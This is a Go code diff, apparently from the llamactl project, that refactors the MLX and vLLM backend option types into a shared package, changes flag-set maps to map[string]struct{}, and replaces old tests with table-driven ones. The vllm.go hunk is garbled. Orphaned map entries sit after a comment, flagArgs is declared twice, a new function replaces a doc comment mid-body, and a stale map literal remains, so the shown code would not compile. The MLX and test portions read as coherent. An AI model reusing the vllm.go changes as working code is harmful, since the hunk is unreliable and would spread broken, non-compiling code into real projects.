 // delegating to the package-level BuildCommandArgs with an empty
 // multi-valued flag set (MLX doesn't currently have []string fields).
 func (o *MlxServerOptions) BuildCommandArgs() []string {
 	return BuildCommandArgs(o, map[string]struct{}{})
 }
 // BuildDockerArgs always returns an empty, non-nil slice for MLX options.
 func (o *MlxServerOptions) BuildDockerArgs() []string {
 	noArgs := []string{}
 	return noArgs
 }
 // ParseCommand parses a mlx_lm.server command string into MlxServerOptions
 // Supports multiple formats:
 // 1. Full command: "mlx_lm.server --model model/path"
 // 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
 // 3. Args only: "--model model/path --host 0.0.0.0"
 // 4. Multiline commands with backslashes
-func ParseMlxCommand(command string) (*MlxServerOptions, error) {
+func (o *MlxServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"mlx_lm.server"}
-	var subcommandNames []string          // MLX has no subcommands
+	var subcommandNames []string            // MLX has no subcommands
-	multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
+	multiValuedFlags := map[string]struct{}{} // MLX has no multi-valued flags
 	var mlxOptions MlxServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/mlx/mlx_test.go
+++ b/pkg/backends/mlx/mlx_test.go
@@ -1,157 +0,0 @@
 package mlx_test
 import (
 	"llamactl/pkg/backends/mlx"
 	"testing"
 )
 func TestParseMlxCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 	}{
 		{
 			name:      "basic command",
 			command:   "mlx_lm.server --model /path/to/model --host 0.0.0.0",
 			expectErr: false,
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model --port 8080",
 			expectErr: false,
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
 			expectErr: false,
 		},
 		{
 			name:      "quoted strings",
 			command:   `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
 			expectErr: false,
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `mlx_lm.server --model test.mlx --chat-template "unterminated`,
 			expectErr: true,
 		},
 		{
 			name:      "malformed flag",
 			command:   "mlx_lm.server ---model test.mlx",
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			result, err := mlx.ParseMlxCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 			}
 		})
 	}
 }
 func TestParseMlxCommandValues(t *testing.T) {
 	command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
 	result, err := mlx.ParseMlxCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if result.Model != "/test/model.mlx" {
 		t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
 	}
 	if result.Port != 8080 {
 		t.Errorf("expected port 8080, got %d", result.Port)
 	}
 	if result.Temp != 0.7 {
 		t.Errorf("expected temp 0.7, got %f", result.Temp)
 	}
 	if !result.TrustRemoteCode {
 		t.Errorf("expected trust_remote_code to be true")
 	}
 	if result.LogLevel != "DEBUG" {
 		t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
 	}
 }
 func TestBuildCommandArgs(t *testing.T) {
 	options := &mlx.MlxServerOptions{
 		Model:           "/test/model.mlx",
 		Host:            "127.0.0.1",
 		Port:            8080,
 		Temp:            0.7,
 		TopP:            0.9,
 		TopK:            40,
 		MaxTokens:       2048,
 		TrustRemoteCode: true,
 		LogLevel:        "DEBUG",
 		ChatTemplate:    "custom template",
 	}
 	args := options.BuildCommandArgs()
 	// Check that all expected flags are present
 	expectedFlags := map[string]string{
 		"--model":         "/test/model.mlx",
 		"--host":          "127.0.0.1",
 		"--port":          "8080",
 		"--log-level":     "DEBUG",
 		"--chat-template": "custom template",
 		"--temp":          "0.7",
 		"--top-p":         "0.9",
 		"--top-k":         "40",
 		"--max-tokens":    "2048",
 	}
 	for i := 0; i < len(args); i++ {
 		if args[i] == "--trust-remote-code" {
 			continue // Boolean flag with no value
 		}
 		if args[i] == "--use-default-chat-template" {
 			continue // Boolean flag with no value
 		}
 		if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
 			if args[i+1] != expectedValue {
 				t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
 			}
 		}
 	}
 	// Check boolean flags
 	foundTrustRemoteCode := false
 	for _, arg := range args {
 		if arg == "--trust-remote-code" {
 			foundTrustRemoteCode = true
 		}
 	}
 	if !foundTrustRemoteCode {
 		t.Errorf("expected --trust-remote-code flag to be present")
 	}
 }
--- a/pkg/backends/mlx_test.go
+++ b/pkg/backends/mlx_test.go
@@ -0,0 +1,204 @@
 package backends_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"testing"
 )
 // TestParseMlxCommand runs MlxServerOptions.ParseCommand over a table of
 // command strings. Cases with expectErr set only require an error; the
 // others require a *backends.MlxServerOptions result, which is then handed
 // to the case's validate callback when one is provided.
 func TestParseMlxCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.MlxServerOptions)
 	}{
 		{
 			name:      "basic command",
 			command:   "mlx_lm.server --model /path/to/model --host 0.0.0.0",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.Host != "0.0.0.0" {
 					t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host)
 				}
 			},
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model --port 8080",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.Port != 8080 {
 					t.Errorf("expected port 8080, got %d", opts.Port)
 				}
 			},
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/model" {
 					t.Errorf("expected model '/path/model', got '%s'", opts.Model)
 				}
 				if opts.Temp != 0.7 {
 					t.Errorf("expected temp 0.7, got %f", opts.Temp)
 				}
 				if !opts.TrustRemoteCode {
 					t.Errorf("expected trust_remote_code to be true")
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/test/model.mlx" {
 					t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model)
 				}
 				if opts.Port != 8080 {
 					t.Errorf("expected port 8080, got %d", opts.Port)
 				}
 				if opts.Temp != 0.7 {
 					t.Errorf("expected temp 0.7, got %f", opts.Temp)
 				}
 				if !opts.TrustRemoteCode {
 					t.Errorf("expected trust_remote_code to be true")
 				}
 				if opts.LogLevel != "DEBUG" {
 					t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel)
 				}
 			},
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `mlx_lm.server --model test.mlx --chat-template "unterminated`,
 			expectErr: true,
 		},
 		{
 			name:      "malformed flag",
 			command:   "mlx_lm.server ---model test.mlx",
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			var opts backends.MlxServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			// ParseCommand returns any; report a wrong dynamic type explicitly
 			// instead of letting it masquerade as a nil result.
 			result, ok := resultAny.(*backends.MlxServerOptions)
 			if resultAny != nil && !ok {
 				t.Errorf("expected *MlxServerOptions, got %T", resultAny)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 // TestMlxBuildCommandArgs_BooleanFields checks that boolean options set to
 // true produce their flag in the built arguments and that false ones do not.
 func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
 	type boolCase struct {
 		name     string
 		options  backends.MlxServerOptions
 		expected []string
 		excluded []string
 	}
 	cases := []boolCase{
 		{
 			name:     "trust_remote_code true",
 			options:  backends.MlxServerOptions{TrustRemoteCode: true},
 			expected: []string{"--trust-remote-code"},
 		},
 		{
 			name:     "trust_remote_code false",
 			options:  backends.MlxServerOptions{TrustRemoteCode: false},
 			excluded: []string{"--trust-remote-code"},
 		},
 		{
 			name: "multiple booleans",
 			options: backends.MlxServerOptions{
 				TrustRemoteCode:        true,
 				UseDefaultChatTemplate: true,
 			},
 			expected: []string{"--trust-remote-code", "--use-default-chat-template"},
 		},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
 			built := tc.options.BuildCommandArgs()
 			// Every expected flag must be present...
 			for _, want := range tc.expected {
 				if found := testutil.Contains(built, want); !found {
 					t.Errorf("Expected argument %q not found in %v", want, built)
 				}
 			}
 			// ...and every excluded flag must be absent.
 			for _, unwanted := range tc.excluded {
 				if found := testutil.Contains(built, unwanted); found {
 					t.Errorf("Excluded argument %q found in %v", unwanted, built)
 				}
 			}
 		})
 	}
 }
 // TestMlxBuildCommandArgs_ZeroValues builds arguments from options whose
 // fields are all zero values and checks that none of the corresponding flag
 // or value tokens show up in the result.
 func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
 	zeroed := backends.MlxServerOptions{
 		Port:            0,     // Should be excluded
 		TopK:            0,     // Should be excluded
 		Temp:            0,     // Should be excluded
 		Model:           "",    // Should be excluded
 		LogLevel:        "",    // Should be excluded
 		TrustRemoteCode: false, // Should be excluded
 	}
 	built := zeroed.BuildCommandArgs()
 	// Zero values should not appear in arguments
 	for _, token := range []string{
 		"--port", "0",
 		"--top-k", "0",
 		"--temp", "0",
 		"--model", "",
 		"--log-level", "",
 		"--trust-remote-code",
 	} {
 		if present := testutil.Contains(built, token); present {
 			t.Errorf("Zero value argument %q should not be present in %v", token, built)
 		}
 	}
 }
--- a/pkg/backends/parser.go
+++ b/pkg/backends/parser.go
@@ -9,8 +9,8 @@ import (
 	"strings"
 )
-// ParseCommand parses a command string into a target struct
+// parseCommand parses a command string into a target struct
-func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
+func parseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]struct{}, target any) error {
 	// Normalize multiline commands
 	command = normalizeCommand(command)
 	if command == "" {
@@ -125,7 +125,7 @@ func extractArgs(command string, executableNames []string, subcommandNames []str
 }
 // parseFlags parses command line flags into a map
-func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
+func parseFlags(args []string, multiValuedFlags map[string]struct{}) (map[string]any, error) {
 	options := make(map[string]any)
 	for i := 0; i < len(args); i++ {
@@ -163,7 +163,7 @@ func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any
 		if hasValue {
 			// Handle multi-valued flags
-			if multiValuedFlags[flagName] {
+			if _, isMultiValue := multiValuedFlags[flagName]; isMultiValue {
 				if existing, ok := options[flagName].([]string); ok {
 					options[flagName] = append(existing, value)
 				} else {
--- a/pkg/backends/vllm/vllm.go
+++ b/pkg/backends/vllm/vllm.go
@@ -1,9 +1,23 @@
-package vllm
+package backends
 import (
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 )
 // vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
 // Based on vLLM's CLI argument definitions with action='append' or List types
 // Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
 // The map is used as a set: only key presence matters, the values are empty structs.
 // It is passed to BuildCommandArgs (argument building) and parseCommand (command parsing).
 // NOTE(review): the map literal previously local to BuildCommandArgs used kebab-case keys
 // (e.g. "api-key"); confirm that BuildCommandArgs looks flags up by snake_case key.
 var vllmMultiValuedFlags = map[string]struct{}{
 	"api_key":         {}, // --api-key (action='append')
 	"allowed_origins": {}, // --allowed-origins (List type)
 	"allowed_methods": {}, // --allowed-methods (List type)
 	"allowed_headers": {}, // --allowed-headers (List type)
 	"middleware":      {}, // --middleware (action='append')
 	"lora_modules":    {}, // --lora-modules (custom LoRAParserAction, accepts multiple)
 	"prompt_adapters": {}, // --prompt-adapters (similar to lora-modules, accepts multiple)
 }
 type VllmServerOptions struct {
 	// Basic connection options (auto-assigned by llamactl)
 	Host string `json:"host,omitempty"`
@@ -130,58 +144,81 @@ type VllmServerOptions struct {
 	OverrideKVCacheALIGNSize  int    `json:"override_kv_cache_align_size,omitempty"`
 }
 // GetPort returns the Port field of the vLLM server options.
 func (o *VllmServerOptions) GetPort() int {
 	port := o.Port
 	return port
 }
 // SetPort stores port in the Port field; no range check is done here
 // (Validate performs the range check).
 func (o *VllmServerOptions) SetPort(port int) {
 	(*o).Port = port
 }
 // GetHost returns the Host field of the vLLM server options.
 func (o *VllmServerOptions) GetHost() string {
 	host := o.Host
 	return host
 }
 // Validate checks the vLLM server options and returns the first problem
 // found: a nil receiver, an error from validation.ValidateStructStrings, or
 // a port outside 0-65535. It returns nil when all checks pass.
 func (o *VllmServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
 	}
 	// Use reflection to check all string fields for injection patterns
 	stringsErr := validation.ValidateStructStrings(o, "")
 	if stringsErr != nil {
 		return stringsErr
 	}
 	// Basic network validation for port
 	if portInRange := o.Port >= 0 && o.Port <= 65535; !portInRange {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs converts VllmServerOptions to command line arguments
-// Note: This does NOT include the "serve" subcommand, that's handled at the instance level
+// For vLLM native, model is a positional argument after "serve"
 // For vLLM, the model parameter is passed as a positional argument, not a --model flag
 func (o *VllmServerOptions) BuildCommandArgs() []string {
 	var args []string
-	// Add model as positional argument if specified
+	// Add model as positional argument if specified (for native execution)
 	if o.Model != "" {
 		args = append(args, o.Model)
 	}
-	// Create a copy of the options without the Model field to avoid including it as --model flag
+	// Create a copy without Model field to avoid --model flag
 	optionsCopy := *o
-	optionsCopy.Model = "" // Clear model field so it won't be included as a flag
+	optionsCopy.Model = ""
-	multipleFlags := map[string]bool{
+	// Use package-level multipleFlags variable
 		"api-key":         true,
 		"allowed-origins": true,
 		"allowed-methods": true,
 		"allowed-headers": true,
 		"middleware":      true,
 	}
-	// Build the rest of the arguments as flags
+	flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
 	flagArgs := backends.BuildCommandArgs(&optionsCopy, multipleFlags)
 	args = append(args, flagArgs...)
 	return args
 }
-// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
+func (o *VllmServerOptions) BuildDockerArgs() []string {
 	var args []string
 	// Use package-level multipleFlags variable
 	flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
 	args = append(args, flagArgs...)
 	return args
 }
 // ParseCommand parses a vLLM serve command string into VllmServerOptions
 // Supports multiple formats:
 // 1. Full command: "vllm serve --model MODEL_NAME --other-args"
 // 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
 // 3. Serve only: "serve --model MODEL_NAME --other-args"
 // 4. Args only: "--model MODEL_NAME --other-args"
 // 5. Multiline commands with backslashes
-func ParseVllmCommand(command string) (*VllmServerOptions, error) {
+func (o *VllmServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"vllm"}
 	subcommandNames := []string{"serve"}
 	multiValuedFlags := map[string]bool{
 		"middleware":      true,
 		"api_key":         true,
 		"allowed_origins": true,
 		"allowed_methods": true,
 		"allowed_headers": true,
 		"lora_modules":    true,
 		"prompt_adapters": true,
 	}
 	var vllmOptions VllmServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, vllmMultiValuedFlags, &vllmOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/vllm/vllm_test.go
+++ b/pkg/backends/vllm/vllm_test.go
@@ -1,153 +0,0 @@
 package vllm_test
 import (
 	"llamactl/pkg/backends/vllm"
 	"slices"
 	"testing"
 )
 func TestParseVllmCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 	}{
 		{
 			name:      "basic vllm serve command",
 			command:   "vllm serve microsoft/DialoGPT-medium",
 			expectErr: false,
 		},
 		{
 			name:      "serve only command",
 			command:   "serve microsoft/DialoGPT-medium",
 			expectErr: false,
 		},
 		{
 			name:      "positional model with flags",
 			command:   "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
 			expectErr: false,
 		},
 		{
 			name:      "model with path",
 			command:   "vllm serve /path/to/model --gpu-memory-utilization 0.8",
 			expectErr: false,
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `vllm serve "unterminated`,
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			result, err := vllm.ParseVllmCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 			}
 		})
 	}
 }
 func TestParseVllmCommandValues(t *testing.T) {
 	command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
 	result, err := vllm.ParseVllmCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if result.Model != "test-model" {
 		t.Errorf("expected model 'test-model', got '%s'", result.Model)
 	}
 	if result.TensorParallelSize != 4 {
 		t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
 	}
 	if result.GPUMemoryUtilization != 0.8 {
 		t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
 	}
 	if !result.EnableLogOutputs {
 		t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
 	}
 }
 func TestBuildCommandArgs(t *testing.T) {
 	options := vllm.VllmServerOptions{
 		Model:                "microsoft/DialoGPT-medium",
 		Port:                 8080,
 		Host:                 "localhost",
 		TensorParallelSize:   2,
 		GPUMemoryUtilization: 0.8,
 		EnableLogOutputs:     true,
 		AllowedOrigins:       []string{"http://localhost:3000", "https://example.com"},
 	}
 	args := options.BuildCommandArgs()
 	// Check that model is the first positional argument (not a --model flag)
 	if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
 		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
 	}
 	// Check that --model flag is NOT present (since model should be positional)
 	if contains(args, "--model") {
 		t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
 	}
 	// Check other flags
 	if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
 		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
 	}
 	if !contains(args, "--enable-log-outputs") {
 		t.Errorf("Expected --enable-log-outputs not found in %v", args)
 	}
 	if !contains(args, "--host") {
 		t.Errorf("Expected --host not found in %v", args)
 	}
 	if !contains(args, "--port") {
 		t.Errorf("Expected --port not found in %v", args)
 	}
 	// Check array handling (multiple flags)
 	allowedOriginsCount := 0
 	for i := range args {
 		if args[i] == "--allowed-origins" {
 			allowedOriginsCount++
 		}
 	}
 	if allowedOriginsCount != 2 {
 		t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
 	}
 }
 // Helper functions
 func contains(slice []string, item string) bool {
 	return slices.Contains(slice, item)
 }
 func containsFlagWithValue(args []string, flag, value string) bool {
 	for i, arg := range args {
 		if arg == flag && i+1 < len(args) && args[i+1] == value {
 			return true
 		}
 	}
 	return false
 }
--- a/pkg/backends/vllm_test.go
+++ b/pkg/backends/vllm_test.go
@@ -0,0 +1,323 @@
 package backends_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"testing"
 )
 // TestParseVllmCommand runs VllmServerOptions.ParseCommand over a table of
 // command strings. Cases with expectErr set only require an error; the
 // others require a *backends.VllmServerOptions result, which is then handed
 // to the case's validate callback when one is provided.
 func TestParseVllmCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.VllmServerOptions)
 	}{
 		{
 			name:      "basic vllm serve command",
 			command:   "vllm serve microsoft/DialoGPT-medium",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 			},
 		},
 		{
 			name:      "serve only command",
 			command:   "serve microsoft/DialoGPT-medium",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 			},
 		},
 		{
 			name:      "positional model with flags",
 			command:   "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 				if opts.TensorParallelSize != 2 {
 					t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
 				}
 			},
 		},
 		{
 			name:      "model with path",
 			command:   "vllm serve /path/to/model --gpu-memory-utilization 0.8",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.GPUMemoryUtilization != 0.8 {
 					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "test-model" {
 					t.Errorf("expected model 'test-model', got '%s'", opts.Model)
 				}
 				if opts.TensorParallelSize != 4 {
 					t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
 				}
 				if opts.GPUMemoryUtilization != 0.8 {
 					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
 				}
 				if !opts.EnableLogOutputs {
 					t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
 				}
 			},
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `vllm serve "unterminated`,
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			var opts backends.VllmServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			// ParseCommand returns any; report a wrong dynamic type explicitly
 			// instead of letting it masquerade as a nil result.
 			result, ok := resultAny.(*backends.VllmServerOptions)
 			if resultAny != nil && !ok {
 				t.Errorf("expected *VllmServerOptions, got %T", resultAny)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 // TestParseVllmCommandArrays checks that repeated --middleware and --api-key
 // flags (in both "--flag value" and "--flag=value" form) are collected, in
 // order, into the Middleware and APIKey slices.
 func TestParseVllmCommandArrays(t *testing.T) {
 	command := "vllm serve test-model --middleware auth.py --middleware=cors.py --api-key key1 --api-key key2"
 	var opts backends.VllmServerOptions
 	resultAny, err := opts.ParseCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	result, ok := resultAny.(*backends.VllmServerOptions)
 	if !ok {
 		t.Fatalf("expected *VllmServerOptions, got %T", resultAny)
 	}
 	expectedMiddleware := []string{"auth.py", "cors.py"}
 	if len(result.Middleware) != len(expectedMiddleware) {
 		t.Errorf("expected %d middleware items, got %d", len(expectedMiddleware), len(result.Middleware))
 	}
 	for i, v := range expectedMiddleware {
 		// Guard the index before formatting the message: a short slice must
 		// produce a test failure, not an index-out-of-range panic.
 		if i >= len(result.Middleware) {
 			t.Errorf("expected middleware[%d]=%s but it is missing", i, v)
 			continue
 		}
 		if result.Middleware[i] != v {
 			t.Errorf("expected middleware[%d]=%s got %s", i, v, result.Middleware[i])
 		}
 	}
 	expectedAPIKeys := []string{"key1", "key2"}
 	if len(result.APIKey) != len(expectedAPIKeys) {
 		t.Errorf("expected %d api keys, got %d", len(expectedAPIKeys), len(result.APIKey))
 	}
 	for i, v := range expectedAPIKeys {
 		// Same guard as above for the API key list.
 		if i >= len(result.APIKey) {
 			t.Errorf("expected api_key[%d]=%s but it is missing", i, v)
 			continue
 		}
 		if result.APIKey[i] != v {
 			t.Errorf("expected api_key[%d]=%s got %s", i, v, result.APIKey[i])
 		}
 	}
 }
 // TestVllmBuildCommandArgs_BooleanFields checks that boolean options set to
 // true produce their flag in the built arguments and that false ones do not.
 func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
 	type boolCase struct {
 		name     string
 		options  backends.VllmServerOptions
 		expected []string
 		excluded []string
 	}
 	cases := []boolCase{
 		{
 			name:     "enable_log_outputs true",
 			options:  backends.VllmServerOptions{EnableLogOutputs: true},
 			expected: []string{"--enable-log-outputs"},
 		},
 		{
 			name:     "enable_log_outputs false",
 			options:  backends.VllmServerOptions{EnableLogOutputs: false},
 			excluded: []string{"--enable-log-outputs"},
 		},
 		{
 			name: "multiple booleans",
 			options: backends.VllmServerOptions{
 				EnableLogOutputs:    true,
 				TrustRemoteCode:     true,
 				EnablePrefixCaching: true,
 				DisableLogStats:     false,
 			},
 			expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
 			excluded: []string{"--disable-log-stats"},
 		},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
 			built := tc.options.BuildCommandArgs()
 			// Every expected flag must be present...
 			for _, want := range tc.expected {
 				if found := testutil.Contains(built, want); !found {
 					t.Errorf("Expected argument %q not found in %v", want, built)
 				}
 			}
 			// ...and every excluded flag must be absent.
 			for _, unwanted := range tc.excluded {
 				if found := testutil.Contains(built, unwanted); found {
 					t.Errorf("Excluded argument %q found in %v", unwanted, built)
 				}
 			}
 		})
 	}
 }
 // TestVllmBuildCommandArgs_ZeroValues builds arguments from options whose
 // fields are all zero values and checks that no flag or value token for them
 // appears, and that an empty model is not emitted as a positional argument.
 func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
 	zeroed := backends.VllmServerOptions{
 		Port:                 0,     // Should be excluded
 		TensorParallelSize:   0,     // Should be excluded
 		GPUMemoryUtilization: 0,     // Should be excluded
 		Model:                "",    // Should be excluded (positional arg)
 		Host:                 "",    // Should be excluded
 		EnableLogOutputs:     false, // Should be excluded
 	}
 	built := zeroed.BuildCommandArgs()
 	// Zero values should not appear in arguments
 	for _, token := range []string{
 		"--port", "0",
 		"--tensor-parallel-size", "0",
 		"--gpu-memory-utilization", "0",
 		"--host", "",
 		"--enable-log-outputs",
 	} {
 		if present := testutil.Contains(built, token); present {
 			t.Errorf("Zero value argument %q should not be present in %v", token, built)
 		}
 	}
 	// Model should not be present as positional arg when empty
 	if len(built) == 0 {
 		return
 	}
 	if built[0] == "" {
 		t.Errorf("Empty model should not be present as positional argument")
 	}
 }
 // TestVllmBuildCommandArgs_ArrayFields checks that every element of a
 // []string option is emitted as its own "--flag value" pair.
 func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
 	listOptions := backends.VllmServerOptions{
 		AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
 		AllowedMethods: []string{"GET", "POST"},
 		Middleware:     []string{"middleware1", "middleware2", "middleware3"},
 	}
 	built := listOptions.BuildCommandArgs()
 	// Check that each array value appears with its flag
 	wanted := []struct {
 		flag   string
 		values []string
 	}{
 		{flag: "--allowed-origins", values: []string{"http://localhost:3000", "https://example.com"}},
 		{flag: "--allowed-methods", values: []string{"GET", "POST"}},
 		{flag: "--middleware", values: []string{"middleware1", "middleware2", "middleware3"}},
 	}
 	for _, entry := range wanted {
 		for _, val := range entry.values {
 			if paired := testutil.ContainsFlagWithValue(built, entry.flag, val); !paired {
 				t.Errorf("Expected %s %s, not found in %v", entry.flag, val, built)
 			}
 		}
 	}
 }
